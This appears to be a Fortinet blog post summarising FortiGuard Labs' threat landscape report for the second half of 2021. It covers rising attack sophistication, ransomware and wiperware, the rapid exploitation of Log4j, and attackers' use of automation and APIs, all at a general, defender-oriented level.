Every six months, FortiGuard Labs publishes an updated Global Threat Landscape Report. This semiannual publication always contains a great deal of new data intelligence that organizations and IT security teams can use to better defend themselves against cyberthreats. The report features the combined intelligence of data compiled from Fortinet sensors worldwide that document billions of threat events.
In the February 2022 issue of the report that covers the second half of 2021, FortiGuard Labs used the MITRE ATT&CK framework as a guide to classify attacker tactics, techniques, and procedures (TTPs). The goal of sorting attack TTPs is to give defenders a better idea of what to expect from attackers and how to be proactive, instead of only reactive.
Another goal of the report is to provide security professionals with global and regional perspectives. We believe the broad and specific insights into the global threat landscape will empower defenders to make good decisions that reduce risks and better protect and preserve their digital resources.
In keeping with a tradition of providing useful and actionable take-aways, the report states that two major trends have emerged over the course of the second half of last year:
1) Cyberattacks are getting more sophisticated.
2) Cybercriminals are developing attacks faster than ever.
Sophisticated Attack Methods
In the past, it was uncommon for cybercriminals to use sophisticated attack methods. Typically, they just used “code” that was available online that they could modify. However, recently, FortiGuard Labs is seeing attacks that are more sophisticated and designed and developed for specific targets.
A great benefit from the Threat Landscape Report is that it offers security professionals a view of “the forest fire” that may have eluded them while they have been focused on keeping their one or two “trees from burning.” It is vitally important to step back and see what is occurring on a macro level. And it is especially important to know what are the latest threats.
Another key take-away from the Threat Landscape Report regarding the increase of sophistication in malware and many other types of attacks is that we are seeing cybercriminals now taking advantage of advanced coding. It’s more than only Python now. Threat actors are now using C++ for Linux, Java, Go, and IoT-based attacks.
More Aggressive
Cybercriminals are employing reconnaissance to uncover vulnerabilities. They are discovering how to exploit these vulnerabilities and stay under the radar by using techniques that weren’t thought of before or weren’t commonly used. We are also seeing a strong commitment in their attempts to elude cybersecurity controls.
In addition to more sophistication, cybercrime attackers are more becoming aggressive—especially with the use of ransomware. During the pandemic, there has been a relentless uptick of ransomware attacks at unprecedented levels. This is very concerning because when you add more attacks with more sophistication, threat levels and attack successes soar. And ransomware settlements. Not only is it getting riskier, but the actual destructiveness of attacks is exploding as well. For example: Wiperware a.k.a. pseudo ransomware, which destroys the target’s systems no matter if a ransom is paid or not.
Quicker Attack Execution
After analyzing the 2021 2H data, FortiGuard Labs found that attack executions are happening faster—especially when you compare them now to previous targeted attacks. Looking back to a decade ago, when cybersecurity professionals had to handle Stuxnet and other famous long-winded threats, it might have taken as long as two years to develop. However, what we saw in December 2021 with Log4j, in just a 10-day period, it accounted for the most volume in our whole reporting period.
Another example of the increase in speed: if we compare Log4j to the ProxyLogon set of vulnerabilities with MS Exchange from 2020, Log4j was 50 times faster. It is disconcerting how much faster it was. Because of the nature of Log4j, as soon as there was a public announcement, there was a spike in traffic as individuals began scanning the internet on all sorts of media. Cybersecurity professionals must now react to most threats within a 48-hour window.
Advantages and Disadvantages of Automation
Security operation centers (SOCs) have been taking advantage of automation using APIs for some time. However, now cybercriminals are realizing they can use the same technology for their illicit purposes. Rather than creating attacks to specifically one target, they are developing mass scans and targeting many organizations with weaknesses. This is a level of sophistication we hadn’t seen before.
Also, what is being revealed by this new level of sophistication and speed is how profitable cybercrime can be. One can use a “reverse-engineering” thought exercise to conclude that if the threat actors are putting so much effort into designing their malware, then they must be realizing a substantial return on their investment (ROI) of time and energy. Remember, cybercriminals are running a business operation too, even if it is illegal. The more cybercriminal organizations can do automation to reduce their costs, the more profitable they will be.
More Threat Report Take-Aways
The Threat Landscape Report also highlights the data that we are seeing when classified using the MITRE Attack Framework TTPs (tactics, techniques, and procedures). View the left side of code execution chart below (Figure 11 from the Report). API and scripting accounted for most of the techniques used by cybercriminals—over sixty percent of all code execution techniques. User execution that requires someone to interact or click on dialogues and malicious links only accounts for twenty percent of the techniques.
Previously, user interaction was the only feasible avenue for breaching a system or for taking over a user’s account and breaching the system as an insider. However, now with APIs, the threat actors can automate their attacks and hack high-value accounts.
Another API benefit for threat actors is not having to “knock on the door.” This is a method for unearthing vulnerabilities that the bad guys can exploit. With APIs, that entire attack may be automated. The cybercriminals can run a script and determine whether an exploit is worth their effort or not. This approach can greatly reduce the criminal enterprise’s expenses.
However, again the same method can be used by IT security teams in many of different ways—from SOCs to cloud deployments and beyond. It's critically important from an organization POV to have security automation reacting quickly.
Learn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard Security Subscriptions and Services portfolio.
Learn more about Fortinet’s free cybersecurity training, an initiative of Fortinet’s Training Advancement Agenda (TAA), or about the Fortinet Network Security Expert program, Security Academy program, and Veterans program.